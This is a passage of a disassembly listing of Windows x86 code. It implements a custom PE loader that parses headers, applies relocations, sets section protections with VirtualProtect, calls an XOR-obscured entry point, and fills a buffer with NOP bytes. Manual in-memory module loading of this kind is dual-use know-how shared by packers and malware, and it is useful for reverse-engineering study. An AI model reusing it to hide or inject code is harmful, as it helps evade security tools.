; ---------------------------------------------------------------------------
loc_4D5B97: ; CODE XREF: sub_4D5B0A+89�j
cmp [ebp+var_1C], 3
jz short loc_4D5BA7
mov ecx, 0EF000016h
call sub_4D8342
loc_4D5BA7: ; CODE XREF: sub_4D5B0A+91�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_14]
add eax, [ebp+var_24]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
sub ecx, [eax+34h]
mov eax, [ebp+var_20]
mov eax, [eax]
add eax, ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_20]
mov ecx, [ebp+var_18]
mov [eax], ecx
jmp short loc_4D5B65
; ---------------------------------------------------------------------------
loc_4D5BD0: ; CODE XREF: sub_4D5B0A+61�j
jmp loc_4D5B25
; ---------------------------------------------------------------------------
locret_4D5BD5: ; CODE XREF: sub_4D5B0A+21�j
leave
retn
sub_4D5B0A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D5BD7 proc near ; DATA XREF: sub_4D61E1+C01�o
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_74 = dword ptr -74h
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 004D6113 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004D6128 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE498
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 7Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_1C], 0
and [ebp+var_4], 0
cmp [ebp+arg_10], 1
jnz loc_4D5F4D
mov [ebp+var_4], 1
call sub_4D58A0
mov ecx, [ebp+arg_8]
xor ecx, eax
mov [ebp+arg_8], ecx
mov eax, [ebp+arg_C]
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov ecx, [ebp+var_24]
add ecx, [eax+3Ch]
mov [ebp+var_40], ecx
mov eax, [ebp+var_40]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_40]
lea eax, [ecx+eax+18h]
mov [ebp+var_34], eax
mov eax, [ebp+var_40]
movzx eax, word ptr [eax+6]
imul eax, 28h
mov ecx, [ebp+var_34]
lea eax, [ecx+eax-28h]
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
mov eax, [ecx+eax+34h]
mov [ebp+var_44], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
mov eax, [ecx+eax+38h]
mov [ebp+var_2C], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
mov eax, [ecx+eax+3Ch]
mov [ebp+var_30], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
mov eax, [ecx+eax+40h]
mov [ebp+var_38], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
lea eax, [ecx+eax+44h]
mov [ebp+var_3C], eax
jmp short loc_4D5CB7
; ---------------------------------------------------------------------------
loc_4D5CAE: ; CODE XREF: sub_4D5BD7:loc_4D5D2A�j
mov eax, [ebp+var_34]
add eax, 28h
mov [ebp+var_34], eax
loc_4D5CB7: ; CODE XREF: sub_4D5BD7+D5�j
mov eax, [ebp+var_34]
cmp eax, [ebp+var_28]
jnb short loc_4D5D2C
mov eax, [ebp+var_3C]
mov eax, [eax]
mov [ebp+var_50], eax
mov eax, [ebp+var_3C]
add eax, 4
mov [ebp+var_3C], eax
mov eax, [ebp+var_3C]
mov eax, [eax]
mov [ebp+var_4C], eax
mov eax, [ebp+var_3C]
add eax, 4
mov [ebp+var_3C], eax
mov eax, [ebp+var_3C]
add eax, 4
mov [ebp+var_3C], eax
push 0
push 0
push [ebp+var_50]
push [ebp+arg_0]
call sub_4D0421
lea eax, [ebp+var_48]
push eax
push 0
push 0
push [ebp+var_4C]
mov eax, [ebp+var_34]
mov ecx, [ebp+var_24]
add ecx, [eax+0Ch]
push ecx
push [ebp+arg_0]
call sub_4D1177
test eax, eax
jz short loc_4D5D20
cmp [ebp+var_48], 0
jnz short loc_4D5D2A
loc_4D5D20: ; CODE XREF: sub_4D5BD7+141�j
mov ecx, 0EF00000Fh
call sub_4D8342
loc_4D5D2A: ; CODE XREF: sub_4D5BD7+147�j
jmp short loc_4D5CAE
; ---------------------------------------------------------------------------
loc_4D5D2C: ; CODE XREF: sub_4D5BD7+E6�j
mov eax, [ebp+var_40]
mov eax, [eax+34h]
cmp eax, [ebp+var_24]
jz short loc_4D5D4B
push [ebp+var_2C]
push [ebp+var_44]
push [ebp+var_40]
push [ebp+var_24]
call sub_4D5B0A
add esp, 10h
loc_4D5D4B: ; CODE XREF: sub_4D5BD7+15E�j
push 5Ch
push [ebp+arg_4]
call sub_4CC700
pop ecx
pop ecx
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_4D5D68
mov eax, [ebp+arg_4]
mov [ebp+var_20], eax
jmp short loc_4D5D6F
; ---------------------------------------------------------------------------
loc_4D5D68: ; CODE XREF: sub_4D5BD7+187�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_4D5D6F: ; CODE XREF: sub_4D5BD7+18F�j
cmp [ebp+var_30], 0
jz short loc_4D5D97
mov eax, [ebp+var_24]
add eax, [ebp+var_30]
mov [ebp+var_54], eax
push [ebp+var_38]
push 1
push [ebp+var_20]
push [ebp+var_40]
push [ebp+var_24]
push [ebp+var_54]
call sub_4D4D70
add esp, 18h
loc_4D5D97: ; CODE XREF: sub_4D5BD7+19C�j
mov eax, ds:dword_4E1954
mov [ebp+var_74], eax
cmp [ebp+var_74], 0
jz short loc_4D5DB8
mov eax, [ebp+var_74]
add eax, 10h
push eax
call ds:dword_4DE01C ; RtlEnterCriticalSection
mov [ebp+var_78], 1
jmp short loc_4D5DBC
; ---------------------------------------------------------------------------
loc_4D5DB8: ; CODE XREF: sub_4D5BD7+1CC�j
and [ebp+var_78], 0
loc_4D5DBC: ; CODE XREF: sub_4D5BD7+1DF�j
movzx eax, [ebp+var_78]
test eax, eax
jz short loc_4D5DFB
push offset sub_4DBB0D
push ds:dword_4E17C0
push [ebp+arg_C]
push [ebp+var_20]
mov ecx, ds:dword_4E1954
call sub_4DB9B1
mov eax, ds:dword_4E1954
mov [ebp+var_7C], eax
cmp [ebp+var_7C], 0
jz short loc_4D5DFB
mov eax, [ebp+var_7C]
add eax, 10h
push eax
call ds:dword_4DE018 ; RtlLeaveCriticalSection
loc_4D5DFB: ; CODE XREF: sub_4D5BD7+1EB�j
; sub_4D5BD7+215�j
push [ebp+arg_4]
push [ebp+arg_C]
mov ecx, ds:dword_4E194C
call sub_4DB98E
cmp ds:dword_4E1680, 2
jb loc_4D5F35
mov eax, [ebp+var_40]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_40]
lea eax, [ecx+eax+18h]
mov [ebp+var_34], eax
and [ebp+var_58], 0
lea eax, [ebp+var_58]
push eax
push 4
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
cdq
push 28h
pop ecx
idiv ecx
push eax
push [ebp+var_34]
call ds:dword_4E17AC ; VirtualProtect
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
lea eax, [ecx+eax+44h]
mov [ebp+var_3C], eax
jmp short loc_4D5E65
; ---------------------------------------------------------------------------
loc_4D5E5C: ; CODE XREF: sub_4D5BD7+32B�j
mov eax, [ebp+var_34]
add eax, 28h
mov [ebp+var_34], eax
loc_4D5E65: ; CODE XREF: sub_4D5BD7+283�j
mov eax, [ebp+var_34]
cmp eax, [ebp+var_28]
jnb loc_4D5F07
mov eax, [ebp+var_3C]
add eax, 8
mov [ebp+var_3C], eax
mov eax, [ebp+var_3C]
mov eax, [eax]
mov [ebp+var_60], eax
mov eax, [ebp+var_3C]
add eax, 4
mov [ebp+var_3C], eax
mov eax, [ebp+var_34]
mov ecx, [ebp+var_60]
mov [eax+24h], ecx
and [ebp+var_5C], 0
mov eax, [ebp+var_60]
and eax, 20000000h
test eax, eax
jz short loc_4D5EC2
mov eax, [ebp+var_60]
and eax, 80000000h
test eax, eax
jz short loc_4D5EB9
mov [ebp+var_5C], 40h
jmp short loc_4D5EC0
; ---------------------------------------------------------------------------
loc_4D5EB9: ; CODE XREF: sub_4D5BD7+2D7�j
mov [ebp+var_5C], 20h
loc_4D5EC0: ; CODE XREF: sub_4D5BD7+2E0�j
jmp short loc_4D5EDE
; ---------------------------------------------------------------------------
loc_4D5EC2: ; CODE XREF: sub_4D5BD7+2CB�j
mov eax, [ebp+var_60]
and eax, 80000000h
test eax, eax
jz short loc_4D5ED7
mov [ebp+var_5C], 4
jmp short loc_4D5EDE
; ---------------------------------------------------------------------------
loc_4D5ED7: ; CODE XREF: sub_4D5BD7+2F5�j
mov [ebp+var_5C], 2
loc_4D5EDE: ; CODE XREF: sub_4D5BD7:loc_4D5EC0�j
; sub_4D5BD7+2FE�j
lea eax, [ebp+var_60]
push eax
push [ebp+var_5C]
mov eax, [ebp+var_34]
mov ecx, [ebp+var_34]
mov eax, [eax+34h]
sub eax, [ecx+0Ch]
push eax
mov eax, [ebp+var_34]
mov ecx, [ebp+var_24]
add ecx, [eax+0Ch]
push ecx
call ds:dword_4E17AC ; VirtualProtect
jmp loc_4D5E5C
; ---------------------------------------------------------------------------
loc_4D5F07: ; CODE XREF: sub_4D5BD7+294�j
mov eax, [ebp+var_40]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_40]
lea eax, [ecx+eax+18h]
mov [ebp+var_34], eax
lea eax, [ebp+var_58]
push eax
push [ebp+var_58]
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
cdq
push 28h
pop ecx
idiv ecx
push eax
push [ebp+var_34]
call ds:dword_4E17AC ; VirtualProtect
loc_4D5F35: ; CODE XREF: sub_4D5BD7+23C�j
and [ebp+var_4], 0
jmp short loc_4D5F4B
; ---------------------------------------------------------------------------
loc_4D5F3B: ; DATA XREF: _5:004DE4A8�o
push [ebp+var_14]
call sub_4D8C27
retn
; ---------------------------------------------------------------------------
loc_4D5F44: ; DATA XREF: _5:004DE4AC�o
mov esp, [ebp+var_18]
and [ebp+var_4], 0
loc_4D5F4B: ; CODE XREF: sub_4D5BD7+362�j
jmp short loc_4D5F6F
; ---------------------------------------------------------------------------
loc_4D5F4D: ; CODE XREF: sub_4D5BD7+34�j
cmp [ebp+arg_10], 0
jnz short loc_4D5F62
call sub_4D58A0
mov ecx, [ebp+arg_8]
xor ecx, eax
mov [ebp+arg_8], ecx
jmp short loc_4D5F6F
; ---------------------------------------------------------------------------
loc_4D5F62: ; CODE XREF: sub_4D5BD7+37A�j
call sub_4D58A0
mov ecx, [ebp+arg_8]
xor ecx, eax
mov [ebp+arg_8], ecx
loc_4D5F6F: ; CODE XREF: sub_4D5BD7:loc_4D5F4B�j
; sub_4D5BD7+389�j
cmp [ebp+arg_8], 0
jz loc_4D6115
mov eax, [ebp+arg_C]
add eax, [ebp+arg_8]
mov [ebp+var_64], eax
mov ds:dword_4E1928, 0FFFFFFFEh
mov eax, ds:dword_4E1960
mov [ebp+var_68], eax
mov [ebp+var_4], 2
pushaw
mov ds:dword_4E1960, esp
mov eax, [ebp+arg_14]
push eax
mov eax, [ebp+arg_10]
push eax
mov eax, [ebp+arg_C]
push eax
call [ebp+var_64]
mov ds:dword_4E1928, eax
mov esp, ds:dword_4E1960
popaw
and [ebp+var_4], 0
call sub_4D5FCD
jmp loc_4D6113
sub_4D5BD7 endp
; =============== S U B R O U T I N E =======================================
sub_4D5FCD proc near ; CODE XREF: sub_4D5BD7+3EC�p
; DATA XREF: _5:004DE4B8�o
mov eax, [ebp-68h]
mov ds:dword_4E1960, eax
cmp dword ptr [ebp+18h], 0
jnz loc_4D60F6
mov eax, ds:dword_4E194C
mov [ebp-80h], eax
cmp dword ptr [ebp-80h], 0
jz short loc_4D6003
mov eax, [ebp-80h]
add eax, 10h
push eax
call ds:dword_4DE01C ; RtlEnterCriticalSection
mov byte ptr [ebp-84h], 1
jmp short loc_4D600A
; ---------------------------------------------------------------------------
loc_4D6003: ; CODE XREF: sub_4D5FCD+1E�j
and byte ptr [ebp-84h], 0
loc_4D600A: ; CODE XREF: sub_4D5FCD+34�j
movzx eax, byte ptr [ebp-84h]
test eax, eax
jz short loc_4D6047
push dword ptr [ebp+14h]
mov ecx, ds:dword_4E194C
call sub_4DB8E0
mov eax, ds:dword_4E194C
mov [ebp-88h], eax
cmp dword ptr [ebp-88h], 0
jz short loc_4D6047
mov eax, [ebp-88h]
add eax, 10h
push eax
call ds:dword_4DE018 ; RtlLeaveCriticalSection
loc_4D6047: ; CODE XREF: sub_4D5FCD+46�j
; sub_4D5FCD+68�j
push 5Ch
push dword ptr [ebp+0Ch]
call sub_4CC700
pop ecx
pop ecx
mov [ebp-6Ch], eax
cmp dword ptr [ebp-6Ch], 0
jnz short loc_4D6064
mov eax, [ebp+0Ch]
mov [ebp-6Ch], eax
jmp short loc_4D606B
; ---------------------------------------------------------------------------
loc_4D6064: ; CODE XREF: sub_4D5FCD+8D�j
mov eax, [ebp-6Ch]
inc eax
mov [ebp-6Ch], eax
loc_4D606B: ; CODE XREF: sub_4D5FCD+95�j
mov eax, ds:dword_4E1954
mov [ebp-8Ch], eax
cmp dword ptr [ebp-8Ch], 0
jz short loc_4D6098
mov eax, [ebp-8Ch]
add eax, 10h
push eax
call ds:dword_4DE01C ; RtlEnterCriticalSection
mov byte ptr [ebp-90h], 1
jmp short loc_4D609F
; ---------------------------------------------------------------------------
loc_4D6098: ; CODE XREF: sub_4D5FCD+B0�j
and byte ptr [ebp-90h], 0
loc_4D609F: ; CODE XREF: sub_4D5FCD+C9�j
movzx eax, byte ptr [ebp-90h]
test eax, eax
jz short loc_4D60E7
push offset sub_4DBB0D
push ds:dword_4E17C0
push dword ptr [ebp-6Ch]
mov ecx, ds:dword_4E1954
call sub_4DB900
mov eax, ds:dword_4E1954
mov [ebp-94h], eax
cmp dword ptr [ebp-94h], 0
jz short loc_4D60E7
mov eax, [ebp-94h]
add eax, 10h
push eax
call ds:dword_4DE018 ; RtlLeaveCriticalSection
loc_4D60E7: ; CODE XREF: sub_4D5FCD+DB�j
; sub_4D5FCD+108�j
mov eax, [ebp+0Ch]
mov [ebp-70h], eax
push dword ptr [ebp-70h]
call sub_4D83DD
pop ecx
loc_4D60F6: ; CODE XREF: sub_4D5FCD+C�j
mov eax, ds:dword_4E1928
mov [ebp-1Ch], eax
mov ds:dword_4E1928, 0FFFFFFFEh
cmp dword ptr [ebp-1Ch], 0FFFFFFFEh
jnz short locret_4D6112
and dword ptr [ebp-1Ch], 0
locret_4D6112: ; CODE XREF: sub_4D5FCD+13F�j
retn
sub_4D5FCD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D5BD7
loc_4D6113: ; CODE XREF: sub_4D5BD7+3F1�j
jmp short loc_4D611C
; ---------------------------------------------------------------------------
loc_4D6115: ; CODE XREF: sub_4D5BD7+39C�j
mov [ebp+var_1C], 1
loc_4D611C: ; CODE XREF: sub_4D5BD7:loc_4D6113�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
jmp short loc_4D6128
; END OF FUNCTION CHUNK FOR sub_4D5BD7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D5BD7
loc_4D6128: ; CODE XREF: sub_4D5BD7+54E�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
; END OF FUNCTION CHUNK FOR sub_4D5BD7
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D613C proc near ; CODE XREF: sub_4D4DC0+23C�p
; sub_4D4DC0:loc_4D501A�p
push ebp
mov ebp, esp
xor eax, eax
cmp ds:dword_4E196C, 0
setnz al
pop ebp
retn
sub_4D613C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D614D proc near ; CODE XREF: sub_4D4DC0:loc_4D500A�p
; sub_4D61E1:loc_4D705C�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 10h
loc_4D6153: ; CODE XREF: sub_4D614D+89�j
and [ebp+var_4], 0
cmp ds:dword_4E196C, 0
jz short loc_4D61D0
mov [ebp+var_8], offset dword_4E196C
loc_4D6167: ; CODE XREF: sub_4D614D:loc_4D61CE�j
mov eax, [ebp+var_8]
cmp dword ptr [eax], 0
jz short loc_4D61D0
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_C], eax
push 0
push 1
mov eax, [ebp+var_C]
push dword ptr [eax]
mov eax, [ebp+var_C]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_C]
push dword ptr [eax+8]
mov eax, [ebp+var_C]
push dword ptr [eax+4]
call sub_4D4D70
add esp, 18h
movzx eax, al
test eax, eax
jz short loc_4D61C3
mov [ebp+var_4], 1
mov eax, [ebp+var_8]
mov eax, [eax]
mov ecx, [ebp+var_8]
mov eax, [eax+10h]
mov [ecx], eax
mov eax, [ebp+var_C]
mov [ebp+var_10], eax
push [ebp+var_10]
call sub_4D83DD
pop ecx
jmp short loc_4D61CE
; ---------------------------------------------------------------------------
loc_4D61C3: ; CODE XREF: sub_4D614D+52�j
mov eax, [ebp+var_8]
mov eax, [eax]
add eax, 10h
mov [ebp+var_8], eax
loc_4D61CE: ; CODE XREF: sub_4D614D+74�j
jmp short loc_4D6167
; ---------------------------------------------------------------------------
loc_4D61D0: ; CODE XREF: sub_4D614D+11�j
; sub_4D614D+20�j
movzx eax, [ebp+var_4]
test eax, eax
jnz loc_4D6153
mov al, [ebp+var_4]
leave
retn
sub_4D614D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D61E1 proc near ; CODE XREF: sub_4D931F+2F�p
; sub_4DAE2D+2D�p
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_10C = dword ptr -10Ch
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
var_F8 = dword ptr -0F8h
var_F4 = dword ptr -0F4h
var_F0 = dword ptr -0F0h
var_EC = dword ptr -0ECh
var_E8 = dword ptr -0E8h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = byte ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = byte ptr -60h
var_5C = byte ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004D6B27 SIZE 00000058 BYTES
; FUNCTION CHUNK AT 004D6B8F SIZE 000004F6 BYTES
; FUNCTION CHUNK AT 004D7132 SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE4C0
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 130h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_12C], edx
mov [ebp+var_128], ecx
or [ebp+var_3C], 0FFFFFFFFh
or [ebp+var_38], 0FFFFFFFFh
or [ebp+var_58], 0FFFFFFFFh
and [ebp+var_34], 0
and [ebp+var_30], 0
and [ebp+var_1C], 0
and [ebp+var_2C], 0
and [ebp+var_54], 0
and [ebp+var_4C], 0
and [ebp+var_50], 0
and [ebp+var_40], 0
and [ebp+var_28], 0
and [ebp+var_24], 0
and [ebp+var_5C], 0
and [ebp+var_20], 0
push offset dword_4E1930
call ds:dword_4E16C4 ; RtlEnterCriticalSection
and [ebp+var_48], 0
mov eax, ds:dword_4E1964
mov [ebp+var_44], eax
and [ebp+var_4], 0
push [ebp+var_128]
call ds:dword_4E1718 ; GetModuleHandleA
test eax, eax
jz short loc_4D62A9
push [ebp+var_128]
call ds:dword_4E175C ; LoadLibraryA
push 0FFFFFFFFh
mov [ebp+var_130], eax
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_130]
jmp loc_4D7132
; ---------------------------------------------------------------------------
loc_4D62A9: ; CODE XREF: sub_4D61E1+9C�j
push [ebp+var_12C]
lea eax, [ebp+var_24]
push eax
push [ebp+var_128]
call sub_4D581E
add esp, 0Ch
mov [ebp+var_6C], eax
cmp ds:dword_4E1964, 0
jz short loc_4D632D
cmp [ebp+var_6C], 0
jz short loc_4D632D
mov eax, ds:dword_4E1964
mov [ebp+var_74], eax
jmp short loc_4D62F1
; ---------------------------------------------------------------------------
loc_4D62DD: ; CODE XREF: sub_4D61E1:loc_4D632B�j
mov eax, [ebp+var_74]
mov eax, [eax+4]
mov [ebp+var_74], eax
mov eax, ds:dword_4E1968
inc eax
mov ds:dword_4E1968, eax
loc_4D62F1: ; CODE XREF: sub_4D61E1+FA�j
cmp [ebp+var_74], 0
jz short loc_4D632D
mov eax, [ebp+var_74]
mov eax, [eax]
cmp eax, [ebp+var_6C]
jnz short loc_4D632B
mov eax, ds:dword_4E1968
inc eax
mov ds:dword_4E1968, eax
push 0FFFFFFFFh
and [ebp+var_134], 0
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_134]
jmp loc_4D7132
; ---------------------------------------------------------------------------
loc_4D632B: ; CODE XREF: sub_4D61E1+11E�j
jmp short loc_4D62DD
; ---------------------------------------------------------------------------
loc_4D632D: ; CODE XREF: sub_4D61E1+EA�j
; sub_4D61E1+F0�j ...
and ds:dword_4E1968, 0
mov eax, [ebp+var_6C]
mov [ebp+var_48], eax
lea eax, [ebp+var_48]
mov ds:dword_4E1964, eax
cmp [ebp+var_6C], 0
jnz loc_4D63CE
mov eax, [ebp+var_128]
mov [ebp+var_78], eax
push [ebp+var_12C]
push 0
push [ebp+var_78]
call ds:dword_4E1758 ; LoadLibraryExA
mov [ebp+var_7C], eax
cmp [ebp+var_7C], 0
jz short loc_4D638E
mov eax, [ebp+var_12C]
and eax, 2
test eax, eax
jnz short loc_4D63AD
push [ebp+var_128]
push [ebp+var_7C]
call sub_4D5070
test eax, eax
jnz short loc_4D63AD
loc_4D638E: ; CODE XREF: sub_4D61E1+18C�j
call ds:dword_4E1710 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_4D63A0
push 7Eh
call ds:dword_4E178C ; RtlRestoreLastWin32Error
loc_4D63A0: ; CODE XREF: sub_4D61E1+1B5�j
push [ebp+var_7C]
call ds:dword_4E16E0 ; FreeLibrary
and [ebp+var_7C], 0
loc_4D63AD: ; CODE XREF: sub_4D61E1+199�j
; sub_4D61E1+1AB�j
push 0FFFFFFFFh
mov eax, [ebp+var_7C]
mov [ebp+var_138], eax
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_138]
jmp loc_4D7132
; ---------------------------------------------------------------------------
loc_4D63CE: ; CODE XREF: sub_4D61E1+165�j
push 0
push 0
push [ebp+var_6C]
call sub_4D8892
add esp, 0Ch
mov [ebp+var_28], eax
push [ebp+var_28]
call ds:dword_4E1718 ; GetModuleHandleA
mov [ebp+var_80], eax
cmp [ebp+var_80], 0
jz short loc_4D6413
push 0FFFFFFFFh
mov eax, [ebp+var_80]
mov [ebp+var_13C], eax
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_13C]
jmp loc_4D7132
; ---------------------------------------------------------------------------
loc_4D6413: ; CODE XREF: sub_4D61E1+20F�j
mov eax, [ebp+var_24]
mov [ebp+var_84], eax
jmp short loc_4D642B
; ---------------------------------------------------------------------------
loc_4D641E: ; CODE XREF: sub_4D61E1:loc_4D644F�j
mov eax, [ebp+var_84]
inc eax
mov [ebp+var_84], eax
loc_4D642B: ; CODE XREF: sub_4D61E1+23B�j
mov eax, [ebp+var_84]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_4D6451
mov eax, [ebp+var_84]
movsx eax, byte ptr [eax]
cmp eax, 2Fh
jnz short loc_4D644F
mov eax, [ebp+var_84]
mov byte ptr [eax], 5Ch
loc_4D644F: ; CODE XREF: sub_4D61E1+263�j
jmp short loc_4D641E
; ---------------------------------------------------------------------------
loc_4D6451: ; CODE XREF: sub_4D61E1+255�j
push 0
lea eax, [ebp+var_3C]
push eax
push 0
push 0
push [ebp+var_24]
call sub_4D0346
test eax, eax
jnz short loc_4D6477
cmp [ebp+var_3C], 0
jnz short loc_4D6477
mov ecx, 0EF00000Fh
call sub_4D8342
loc_4D6477: ; CODE XREF: sub_4D61E1+284�j
; sub_4D61E1+28A�j
lea eax, [ebp+var_60]
push eax
push [ebp+var_3C]
call sub_4D0672
push 40h
call sub_4D835A
pop ecx
mov [ebp+var_F4], eax
mov eax, [ebp+var_F4]
mov [ebp+var_50], eax
lea eax, [ebp+var_64]
push eax
push 0
push 0
push 40h
push [ebp+var_50]
push [ebp+var_3C]
call sub_4D1177
test eax, eax
jz short loc_4D64B9
cmp [ebp+var_64], 0
jnz short loc_4D64C3
loc_4D64B9: ; CODE XREF: sub_4D61E1+2D0�j
mov ecx, 0EF00000Fh
call sub_4D8342
loc_4D64C3: ; CODE XREF: sub_4D61E1+2D6�j
push 0
push 0
mov eax, [ebp+var_50]
push dword ptr [eax+3Ch]
push [ebp+var_3C]
call sub_4D0421
push 0F8h
call sub_4D835A
pop ecx
mov [ebp+var_F8], eax
mov eax, [ebp+var_F8]
mov [ebp+var_4C], eax
lea eax, [ebp+var_64]
push eax
push 0
push 0
push 0F8h
push [ebp+var_4C]
push [ebp+var_3C]
call sub_4D1177
test eax, eax
jz short loc_4D6511
cmp [ebp+var_64], 0
jnz short loc_4D651B
loc_4D6511: ; CODE XREF: sub_4D61E1+328�j
mov ecx, 0EF00000Fh
call sub_4D8342
loc_4D651B: ; CODE XREF: sub_4D61E1+32E�j
mov eax, [ebp+var_4C]
cmp dword ptr [eax], 4550h
jz short loc_4D6530
mov ecx, 0EF00000Ch
call sub_4D8342
loc_4D6530: ; CODE XREF: sub_4D61E1+343�j
mov eax, [ebp+var_4C]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_4C]
lea eax, [ecx+eax+18h]
sub eax, [ebp+var_4C]
mov ecx, [ebp+var_50]
mov ecx, [ecx+3Ch]
add ecx, eax
mov [ebp+var_70], ecx
mov eax, [ebp+var_4C]
movzx eax, word ptr [eax+6]
imul eax, 28h
mov ecx, [ebp+var_70]
add ecx, eax
mov [ebp+var_68], ecx
mov [ebp+var_34], 600h
push [ebp+var_34]
call sub_4D835A
pop ecx
mov [ebp+var_FC], eax
mov eax, [ebp+var_FC]
mov [ebp+var_1C], eax
mov ecx, [ebp+var_34]
xor eax, eax
mov edi, [ebp+var_1C]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
push 200h
call sub_4D835A
pop ecx
mov [ebp+var_100], eax
mov eax, [ebp+var_100]
mov [ebp+var_54], eax
mov ecx, 80h
mov eax, 90909090h
mov edi, [ebp+var_54]
rep stosd
push 0
push 0
push 0
push [ebp+var_3C]
call sub_4D0421
